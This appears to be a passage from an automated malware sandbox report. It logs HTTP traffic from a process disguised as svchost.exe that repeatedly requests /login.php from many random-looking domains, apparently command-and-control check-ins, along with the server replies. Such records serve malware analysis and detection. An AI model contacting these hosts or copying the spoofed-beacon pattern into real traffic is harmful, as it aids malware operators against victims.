                                                                                                                                                                                                              12192.168.2.84972144.221.84.105807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.163611889 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vocyzit.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.608371973 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              13192.168.2.849722154.212.231.82807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.878634930 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.778871059 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:10 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.817636013 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.176943064 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:11 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.063997984 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.422350883 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Nov 11, 2024 18:33:35.413960934 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:35.785597086 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:35 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              14192.168.2.84972413.248.169.48807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.456636906 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupydeq.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.902740955 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:12 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              15192.168.2.849725188.114.96.3807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.723759890 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.583972931 CET799INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:13 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qIH5nBpvu97vfpTRI%2FPeqcZwtQc5UbikrTTfkLzsv7Dnc9qT6DGSz%2F6fUYh9B8RIm%2FZlPbtmlT4giJhsaGJ%2Bc6Rh73NMI1Lv3KNn6EBxyW98ErUJ%2B8rfpBDac9OyXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006ace9d3ac72-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12220&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.586527109 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.766532898 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:16.123976946 CET971INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:16 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Lwajwd9ivunoMU4pPvyoOV1PU3KpoXrzlpWFNEbsEx5zZGsonxKP2HrndTkoN4Rag5Y51uVzlepr3%2F7hqmudDc9NFHTnVWM4hSdQJrQQ3qGuG5CLbl6mk5GEsUKAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006bdd99cac72-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12218&sent=5&recv=7&lost=0&retrans=0&sent_bytes=972&recv_bytes=486&delivery_rate=285507&cwnd=39&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.156356096 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.526571035 CET804INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:38 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ZS5SK5VaRyOFUqLl0ogej3xQHaI2jQ1o05LEiiWlgnJ6do4cQbdHwJVd2nuUmJDnDwvIDiO1jXeXzaYcTVEPCvpsClpnkykPnUKKIgOMcncD5%2BGw55p2p%2FKKED%2FnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e100749c9aeac72-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12207&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1943&recv_bytes=729&delivery_rate=285507&cwnd=41&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.526650906 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Nov 11, 2024 18:33:40.907377005 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:41.269639969 CET979INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:41 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnRFf7dM6s%2Bjmmw4RHBHU90dtjsWu%2FUjLhpWMuqdKeik6dwLDt3Lc2huPMV7EuSA1GRP%2BkrNs3jeYHYgMz9UG6CfOrR0vgOruMZhB4L3oxV92wR%2BLPyU559PYATHzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10075aff17ac72-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12199&sent=12&recv=14&lost=0&retrans=0&sent_bytes=2920&recv_bytes=972&delivery_rate=308478&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              16192.168.2.8497263.94.10.34807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.751336098 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lygynud.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.177643061 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:13 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=562a2781670064c155bc5eb58ecb8e88|66.23.206.109|1731346393|1731346393|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              17192.168.2.84972718.208.156.248807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.869266033 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupycag.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.302082062 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:13 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=fec41e04a42a2cb45bfad064cbfb06df|66.23.206.109|1731346393|1731346393|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              18192.168.2.849728103.150.10.48807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.073059082 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
